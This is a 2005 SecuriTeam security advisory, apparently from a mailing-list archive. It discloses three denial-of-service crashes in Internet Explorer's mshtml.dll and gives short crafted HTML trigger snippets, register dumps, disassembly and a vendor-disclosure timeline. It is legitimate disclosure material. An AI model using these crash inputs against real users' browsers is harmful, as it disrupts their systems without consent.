[NT] Microsoft Internet Explorer Multiple DoS (datasrc, mshtml.dll)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 28 Dec 2005 12:23:30 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Microsoft Internet Explorer Multiple DoS (datasrc, mshtml.dll)
------------------------------------------------------------------------
SUMMARY
<http://www.microsoft.com/windows/ie/default.mspx> Internet Explorer,
"abbreviated IE or MSIE, is a proprietary web browser made by Microsoft
and currently available as part of Microsoft Windows".
Microsoft Internet Explorer can be caused to crash with access violation
error by feeding it specially crafted HTML files.
DETAILS
Vulnerable Systems:
* Microsoft Internet Explorer 6.0 for Windows XP Pro SP2
(6.0.2900.2180.xpsp_sp2)
* Microsoft Internet Explorer 6.0 for Windows 2000 SP4
* Microsoft Internet Explorer 5.5 for Windows XP Pro SP2
* Microsoft Internet Explorer 5.01 for Windows XP Pro SP2
Denial of Service 1: (<mshtml.dll>#7d663471)
Following HTML code forces MS IE 6 to crash:
<table datasrc=".">
These are the register values and the ASM dump at the time of the access
violation:
eax=00000000 ebx=01293b38 ecx=01293b20 edx=7d74ede0 esi=01293b20
edi=00000000 eip=7d663471 esp=0012e89c ebp=0012e89c
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
7d663469 8bff mov edi,edi
7d66346b 55 push ebp
7d66346c 8bec mov ebp,esp
7d66346e 8b4110 mov eax,[ecx+0x10]
FAULT ->7d663471 66833823 cmp word ptr [eax],0x23 ds:0023:00000000=????
7d663475 7405 jz mshtml+0x1b347c (7d66347c)
7d663477 33c0 xor eax,eax
7d663479 40 inc eax
7d66347a eb1e jmp mshtml+0x1b349a (7d66349a)
7d66347c ff7508 push dword ptr [ebp+0x8]
7d66347f 8b09 mov ecx,[ecx]
7d663481 83c002 add eax,0x2
7d663484 50 push eax
7d663485 e8466cebff call mshtml+0x6a0d0 (7d51a0d0)
7d66348a 8bc8 mov ecx,eax
7d66348c e8ad44fbff call mshtml!CreateHTMLPropertyPage+0x2432c
(7d61793e)
7d663491 33c9 xor ecx,ecx
7d663493 85c0 test eax,eax
7d663495 0f9cc1 setl cl
7d663498 8bc1 mov eax,ecx
7d66349a 5d pop ebp
7d66349b c20400 ret 0x4
The access violation results in a null pointer dereference and is not
exploitable.
MS IE parses the attribute value of 'datasrc' ("[n].[m]") in the following
way:
* Split the attribute value in two parts
* Compare the first char of [n] with 0x23 ('#')
The reason for the crash is that the 0 byte long [n] (no memory is
allocated for this string) is used without any validation.
For example:
> char *t = NULL;
>
> if(t[0] = 0x23)
Denial of Service 2: (<mshtml.dll>#7d6c74b1)
Following HTML code forces M$ IE 6 to crash:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN">
</samp></colgroup><ul><font><menu> <code> <var>
<sub><h2></fieldset>
</kbd></frameset>
</ins></map></noframes>
</isindex>
</code>
</div></title>
</del></var><isindex>
<i>
These are the register values and the ASM dump at the time of the access
violation:
eax=0129040a ebx=0129ef30 ecx=00000001 edx=012945f0 esi=00000000
edi=0012b3a8 eip=7d6c74b1 esp=0012b280 ebp=0012b2a8
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
7d6c748b 6a0b push 0xb
7d6c748d 33c0 xor eax,eax
7d6c748f 59 pop ecx
7d6c7490 8bfe mov edi,esi
7d6c7492 f3ab rep stosd
7d6c7494 8b45f8 mov eax,[ebp-0x8]
7d6c7497 8906 mov [esi],eax
7d6c7499 897228 mov [edx+0x28],esi
7d6c749c e9af010000 jmp mshtml+0x217650 (7d6c7650)
7d6c74a1 8b4728 mov eax,[edi+0x28]
7d6c74a4 8b7028 mov esi,[eax+0x28]
7d6c74a7 897728 mov [edi+0x28],esi
7d6c74aa 8b4320 mov eax,[ebx+0x20]
7d6c74ad 668b4002 mov ax,[eax+0x2]
FAULT ->7d6c74b1 8b4e24 mov ecx,[esi+0x24]
ds:0023:00000024=????????
7d6c74b4 66250030 and ax,0x3000
7d6c74b8 662d0010 sub ax,0x1000
7d6c74bc 66f7d8 neg ax
7d6c74bf 897510 mov [ebp+0x10],esi
7d6c74c2 1bc0 sbb eax,eax
7d6c74c4 40 inc eax
7d6c74c5 50 push eax
7d6c74c6 e80c8efeff call mshtml+0x2002d7 (7d6b02d7)
7d6c74cb 0fb6c0 movzx eax,al
7d6c74ce 48 dec eax
7d6c74cf 83f80c cmp eax,0xc
7d6c74d2 0f877b010000 jnbe mshtml+0x217653 (7d6c7653)
7d6c74d8 ff2485c7796c7d jmp dword ptr [mshtml+0x2179c7
(7d6c79c7)+eax*4]
7d6c74df 8b4e20 mov ecx,[esi+0x20]
7d6c74e2 f6410208 test byte ptr [ecx+0x2],0x8
7d6c74e6 7419 jz mshtml+0x217501 (7d6c7501)
7d6c74e8 8b45fc mov eax,[ebp-0x4]
7d6c74eb ff7014 push dword ptr [eax+0x14]
7d6c74ee 8b4610 mov eax,[esi+0x10]
7d6c74f1 03460c add eax,[esi+0xc]
7d6c74f4 50 push eax
7d6c74f5 e899ba0100 call mshtml+0x232f93 (7d6e2f93)
It appears to be a null read dereference crash which is not exploitable.
Denial of Service 3: (<mshtml.dll>#7d6d8eba)
Following HTML code forces MS IE 6 to crash:
<acronym><dd><h5><applet></caption></applet><li></h1>
These are the register values and the ASM dump at the time of the access
violation:
eax=00000000 ebx=01295390 ecx=00000000 edx=00000000 esi=0012d230
edi=01290720 eip=7d6d8eba esp=0012cd08 ebp=00000000
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
7d6d8e84 894c2414 mov [esp+0x14],ecx
7d6d8e88 8b8ea4000000 mov ecx,[esi+0xa4]
7d6d8e8e 24fe and al,0xfe
7d6d8e90 57 push edi
7d6d8e91 89542410 mov [esp+0x10],edx
7d6d8e95 8954241c mov [esp+0x1c],edx
7d6d8e99 88442420 mov [esp+0x20],al
7d6d8e9d e89912e5ff call mshtml+0x7a13b (7d52a13b)
7d6d8ea2 8b4c2428 mov ecx,[esp+0x28]
7d6d8ea6 68b2a06e7d push 0x7d6ea0b2
7d6d8eab 8bf8 mov edi,eax
7d6d8ead e89bb7e5ff call mshtml+0x8464d (7d53464d)
7d6d8eb2 50 push eax
7d6d8eb3 8bcf mov ecx,edi
7d6d8eb5 e8dfebfdff call mshtml+0x207a99 (7d6b7a99)
FAULT ->7d6d8eba 668b500c mov dx,[eax+0xc]
ds:0023:0000000c=????
7d6d8ebe 6685d2 test dx,dx
7d6d8ec1 7c39 jl mshtml+0x228efc (7d6d8efc)
7d6d8ec3 833d50e3747d01 cmp dword ptr [mshtml+0x29e350
(7d74e350)],0x1
7d6d8eca 0fbffa movsx edi,dx
7d6d8ecd 7513 jnz mshtml+0x228ee2 (7d6d8ee2)
7d6d8ecf a14ce3747d mov eax,[mshtml+0x29e34c
(7d74e34c)]
7d6d8ed4 8b484c mov ecx,[eax+0x4c]
7d6d8ed7 8b4134 mov eax,[ecx+0x34]
7d6d8eda 8d147f lea edx,[edi+edi*2]
7d6d8edd 8b3c90 mov edi,[eax+edx*4]
7d6d8ee0 eb23 jmp mshtml+0x228f05 (7d6d8f05)
The access violation results in a null pointer dereference and is not
exploitable.
Patch Availability:
There is no patch yet.
The vulnerability will be fixed in an upcoming service pack according to
the Microsoft Security Response Center.
Disclosure Timeline:
* 26.11.05 - DoS vulnerability discovered
* 15.12.05 - Vendor contacted
* 17.12.05 - Vendor confirmed vulnerability
* 24.12.05 - Public release
ADDITIONAL INFORMATION
The information has been provided by <mailto:bugtraq@xxxxxxxxxx>
Christian Deneke, <mailto:bugtraq@xxxxxxxxxxxx> Thomas Waldegger.
The original article can be found at: <http://buha.info/board/>
http://buha.info/
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [UNIX] Sudo Perl Local Privileges Escalation
- Next by Date: [EXPL] Windows Metafile mtNoObjects (MS05-053, DoS, Exploit)
- Previous by thread: [UNIX] Sudo Perl Local Privileges Escalation
- Next by thread: [EXPL] Windows Metafile mtNoObjects (MS05-053, DoS, Exploit)
- Index(es):
Relevant Pages
- [NT] Microsoft IE Recursive Scripting, Embedded Files, window() and Restricted Sites DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Internet Explorer,
exploiting these vulnerabilities allows ... malicious attacker to crash a vulnerable browser.
... The bug occurs, ... (Securiteam) - [NT] WebcamXP Access Violation and Limited Informations Disclosure
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... WebcamXP Access Violation
and Limited Informations Disclosure ... For example /pocketpc allows to access the memory
above and below ... (Securiteam) - [NT] Internet Explorers Image Decoder Multiple Vulnerabilities
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... a potential remote code execution
path in Microsoft Internet Explorer, ... MSIE performed admirably compared to other
browsers (although ... Several MSIE crash sample files from that 30-minute run are available
at: ... (Securiteam) - [EXPL] MS Internet Explorer 6 Null Pointer Dereference Exploit (mshtml.dll)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Internet Explorer
version 6 crashes when you open the attached ... Windows XP SP2 FULL PATCHED ...
Windows 2000 Advanced Server ... (Securiteam) - [NEWS] IBM Lotus Domino Server Web Service DoS Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Lotus Domino Server web service
allows attackers to crash the service, ... This results in the immediate crash of nHTTP.EXE
and is not reported to ... Exploitation of this vulnerability allows unauthenticated remote
attackers ... (Securiteam)
